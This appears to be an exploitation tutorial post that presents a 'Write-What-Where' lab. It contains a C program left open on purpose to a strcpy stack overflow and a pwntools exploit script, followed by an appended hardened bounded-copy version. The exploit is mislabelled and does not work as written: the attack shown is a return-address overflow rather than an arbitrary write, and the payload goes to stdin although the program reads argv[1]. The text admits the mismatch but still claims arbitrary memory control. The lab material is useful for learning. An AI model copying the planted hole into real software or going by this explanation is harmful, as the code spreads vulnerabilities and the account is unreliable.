strangerRidingCaml

Linux kernel exploit

7. Write-What-Where (Arbitrary Memory Overwrite)

woddlwoddl 2024. 5. 12. 03:03

A Write-What-Where (WWW) attack is a type of exploitation in which an attacker gains control over arbitrary memory locations and can write arbitrary data to them: the attacker chooses both the value written (the "what") and the address it is written to (the "where").

Lab Activity: Write-What-Where (Arbitrary Memory Overwrite) Attack

In this lab activity, we'll demonstrate a simple WWW attack on a vulnerable C program.

Defender Side Code:


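#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: copies input into a fixed 64-byte stack buffer
 * with no length check. */
void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);  /* overflows buffer when input is 64 bytes or longer */
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }

    /* argv[1] is attacker-controlled and passed through unchecked */
    vulnerable_function(argv[1]);
    return 0;
}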

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):


from pwn import *

# Address of the location to write to
write_location = 0x7fffffffdd38  # Example address, adjust as necessary

# Data to write to the location
write_data = b"\x41\x41\x41\x41"  # Example data, adjust as necessary

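# Padding to fill the buffer and reach the saved return address
# (72 is an example offset; it depends on how the program was compiled)
padding = b"A" * 72

# Payload: padding, then the target address, then the data
payload = padding + p64(write_location) + write_data

# Start the vulnerable program as a local process
p = process("./vulnerable_program")

# Send the payload on stdin (the program above takes its input from argv[1])
p.sendline(payload)

# Hand the process's input and output over to the terminal
p.interactive()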

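The exploit code constructs a payload that starts with padding to fill the buffer and reach the saved return address, followed by the address of the location to write to and the data to write to that location. It then starts the vulnerable program, sends the payload, and, upon successful exploitation, gains control over arbitrary memory locations. Note that the lab program reads its input from argv[1] while the script sends the payload on stdin, and that strcpy writes linearly from the start of buffer toward higher addresses, so the memory this overflow reaches directly is the stack above buffer, including the saved return address.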
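
The bounded counterpart to vulnerable_function from the lab above, as an added example that is not part of the original post: it rejects input that does not fit the 64-byte buffer and uses guard words on either side of the buffer to confirm nothing adjacent was written. The names copy_checked, hardened_function, struct frame and the GUARD value are hypothetical, chosen for illustration.

```c
/* Added example (not from the original post): bounded replacement for the
 * strcpy() call in vulnerable_function. All names here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64
#define GUARD 0x5AA5C33CUL

/* Guard words on both sides of the buffer make an out-of-bounds write visible. */
struct frame {
    unsigned long guard_before;
    char buffer[BUF_SIZE];
    unsigned long guard_after;
};

/* Copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 on NULL or oversize input (dst is left empty). */
int copy_checked(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || dst_size == 0) return -1;
    dst[0] = '\0';
    if (src == NULL) return -1;
    const char *end = memchr(src, '\0', dst_size); /* scans at most dst_size bytes */
    if (end == NULL) return -1;                    /* no terminator in range: reject */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Same role as vulnerable_function, but long input is rejected instead of
 * overwriting adjacent memory. Returns 0 if copied, -1 if rejected,
 * -2 if a guard word changed (which would indicate a bug in the copy). */
int hardened_function(const char *input) {
    struct frame f = { GUARD, {0}, GUARD };
    int rc = copy_checked(f.buffer, sizeof f.buffer, input);
    if (f.guard_before != GUARD || f.guard_after != GUARD) return -2;
    return rc;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <input>\n", argv[0]);
        return 1;
    }
    if (hardened_function(argv[1]) != 0) {
        fprintf(stderr, "input rejected: longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

Building with `gcc -O2 -D_FORTIFY_SOURCE=2 -fstack-protector-strong` adds compiler-level checks on top of the explicit bounds check.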